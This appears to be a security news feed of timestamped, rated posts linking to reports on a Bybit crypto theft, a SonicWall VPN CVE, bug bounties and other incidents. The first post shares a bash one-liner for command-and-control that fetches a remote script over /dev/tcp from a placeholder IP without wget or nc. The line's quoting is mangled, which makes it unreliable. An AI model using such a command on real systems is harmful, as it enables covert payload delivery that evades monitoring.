5️⃣ 1 liner bash for C2 without using any native program like wget, nc etc, esp containers. bash-c “exec 3/dev/tcp/IP/80; echo -e GET/ youfile.sh HTTP/1.1\r\nHost; ip\r\nConnection: close\r\n\r\n’ >&3; cat yourfile.sh’ Source: Linkedin | Harvey Spec
All posts by John Doe
February 22, 2025 at 12:46PM
■■□□□ Introduction to the IoT/Embedded Linux: The OpenWRT Project. https://www.hackers-arise.com/post/introduction-to-the-iot-embedded-linux-the-openwrt-project
February 22, 2025 at 12:45PM
■■■□□ User Email Disclosure via ID-Based Invitation. https://hackerone.com/reports/3003716
February 22, 2025 at 12:09PM
■■■■□ Unconfirmed: North Korea’s Lazarus Group stole $1.4 billion from Bybit.
February 22, 2025 at 12:10AM
■■■□□ Microsoft expands Copilot bug bounty targets, payouts. https://www.theregister.com/2025/02/20/microsoft_copilot_bug_bounty_updated/ https://msrc.microsoft.com/blog/2025/02/exciting-updates-to-the-copilot-ai-bounty-program-enhancing-security-and-incentivizing-innovation/
February 21, 2025 at 10:31PM
■■■□□ Bybit cryptocurrency exchange experienced a loss of approximately $1,400,000,000 today, primarily in ETH. The perpetrator employed sophisticated transaction chains to obfuscate the movement of funds and hinder traceability.
February 21, 2025 at 07:45PM
■■■■□ SonicWall CVE-2024-53704: SSL VPN Session Hijacking. https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
February 21, 2025 at 07:43PM
■■■■□ 9️⃣ Apple removes cloud encryption feature from UK after the government ordered the company to build a backdoor for accessing user data — Bloomberg
February 21, 2025 at 06:18PM
■■□□□ Microsoft fixes Power Pages zero-day bug exploited in attacks. https://www.bleepingcomputer.com/news/security/microsoft-fixes-power-pages-zero-day-bug-exploited-in-attacks/
February 20, 2025 at 09:28PM
■■□□□ A new and dangerous keylogger is on the loose – here’s how to stay safe. https://www.techradar.com/pro/security/a-new-and-dangerous-keylogger-is-on-the-loose-heres-how-to-stay-safe